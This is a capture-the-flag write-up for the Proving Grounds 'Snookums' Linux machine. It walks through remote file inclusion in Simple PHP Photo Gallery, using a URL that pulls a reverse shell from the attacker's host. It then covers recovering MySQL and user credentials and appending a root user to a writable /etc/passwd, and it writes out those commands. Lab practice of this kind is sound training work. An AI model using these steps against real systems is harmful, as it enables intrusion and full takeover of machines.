Snookums
Source: Proving Grounds OS: Linux Community Rating: Intermediate
Enumeration & Reconnaissance
Autorecon revealed open ports:
FTP (21)
SSH (22)
HTTP (80)
RPC (111)
SMB (139 & 445)
MySQL (3306 & 33060)
Usually, I’d check FTP first, especially since anonymous login was allowed, but I dove straight into HTTP (80) and got too involved to notice FTP until later.
Service Analysis
The HTTP server hosted a Simple PHP Photo Gallery (v0.8).
A version number at the bottom screamed "vulnerable." Searching for CVEs led me to EDB-ID 48424 (no CVE assigned), an RFI vulnerability in the
imgparameter:
http://192.168.192.58/image.php?img=http://192.168.45.201/shell.phpGaining Initial Access
I crafted a PHP reverse shell and hosted it on my machine. Initial attempts with ports 901/9911 failed, likely firewall issues. Switching to ports 80/22 worked, and I landed a shell as apache.
Uploaded
linpeas.sh, which flagged a PHP config file containing MySQL credentials: root:MalapropDoffUtilize1337.
mysql -u root -pFound the SimplePHPGal database. That had a users table with 3 users alongside their encoded passwords, I picked the user michael since it was the one that's in the home directory.
echo "U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==" | base64 -d | base64 -dDecoding it gave HockSydneyCertify123.
Privilege Escalation
I then switched to michael and re-ran
linpeas.sh, which revealed writable /etc/passwd.
It means we can add a new user as root. I generated a password hash for "pwned":
openssl passwd pwned
Appended a new root user, kingkong, to
/etc/passwdusingecho:
echo "kingkong:\$1\$xr7pWWIR\$vNF8Z7sc8mgBu6u7ZETyT/:0:0:root:/root:/bin/bash" >> /etc/passwd Switching to kingkong granted root access.
Lessons Learned
FTP Blindness: Skipping FTP might cost time, check obvious services first.
RFI Port Woes: Firewalls hate fancy ports, stick to 80/443 for shells.
Double Encoding: Always decode twice… or thrice.
/etc/passwd Write Abuse: If writable, plant a root user and call it a day.
Last updated